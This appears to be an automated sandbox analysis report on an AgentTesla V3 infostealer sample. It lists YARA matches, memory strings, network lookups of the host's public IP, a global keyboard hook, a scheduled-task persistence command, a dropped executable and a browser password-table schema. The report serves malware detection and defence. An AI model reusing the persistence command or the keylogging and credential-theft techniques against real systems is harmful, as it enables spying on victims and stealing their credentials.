Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.332440019.00000000071C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: IwUNvHNy.exe, 0000000E.00000002.533988988.00000000033AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://LwV7dxVvQwzS29UTCu.com
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgmail.strictfacilityservices.comaccounts
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.524293663.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.524696684.0000000003111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\IwUNvHNy.exe

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.308476627.00000000014CB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 11.2.IwUNvHNy.exe.293a138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.31ea1d8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown

.NET source code contains very large array initializations

Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB0063866u002d9900u002d46A9u002dBAF8u002dC30A0EC83145u007d/u00340AC4BAEu002d6FADu002d49F9u002dADA9u002d9C669FAB2230.cs

Large array initialization: .cctor: array initializer size 10995

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 11.2.IwUNvHNy.exe.293a138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4269b20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.4314970.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.31ea1d8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0000000A.00000000.305776965.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 5996, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe PID: 532, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 0_2_0177C1B4	0_2_0177C1B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 0_2_0177E670	0_2_0177E670
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 0_2_0177E680	0_2_0177E680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 0_2_0764A758	0_2_0764A758
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_00F6FC18	10_2_00F6FC18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_00F66D40	10_2_00F66D40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_05C9C690	10_2_05C9C690
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_05C9D3F0	10_2_05C9D3F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_05C90040	10_2_05C90040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_05C90930	10_2_05C90930
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_05C92A40	10_2_05C92A40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695EED0	10_2_0695EED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695AEE8	10_2_0695AEE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695E608	10_2_0695E608
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06958D38	10_2_06958D38
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695D620	10_2_0695D620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695E4B8	10_2_0695E4B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695A4D1	10_2_0695A4D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06953582	10_2_06953582
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_069535CD	10_2_069535CD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_069525F8	10_2_069525F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_0695393D	10_2_0695393D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06A13630	10_2_06A13630
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06A10DF8	10_2_06A10DF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06A15A40	10_2_06A15A40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Code function: 10_2_06A18936	10_2_06A18936

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.321918761.0000000004396000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImbSRib.exe> vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000000.247679253.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameImbSRib.exe> vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.316510086.00000000041EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCassa.dll< vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.309903707.00000000030C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.336301911.0000000007900000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCassa.dll< vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 00000000.00000002.336921010.0000000007B20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000000.306091299.0000000000438000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilename2f5267af-d0fd-4225-915c-9145a26ede74.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.515826219.00000000009C8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Binary or memory string: OriginalFilenameImbSRib.exe> vs SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: IwUNvHNy.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe C:\Users\user\AppData\Roaming\IwUNvHNy.exe
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe {path}
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmp2885.tmp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe {path}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IwUNvHNy" /XML "C:\Users\user\AppData\Local\Temp\tmpD8CA.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Process created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe {path}	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

File created: C:\Users\user\AppData\Roaming\IwUNvHNy.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2885.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/5@8/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe, 0000000A.00000002.533880497.0000000002DA3000.00000004.00000800.00020000.00000000.sdmp, IwUNvHNy.exe, 0000000E.00000002.533836133.00000000033A6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:644:120:WilError_01
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	Mutant created: \Sessions\1\BaseNamedObjects\wGWyZQWLyISRnwWQTXN

Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 10.0.SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IwUNvHNy.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
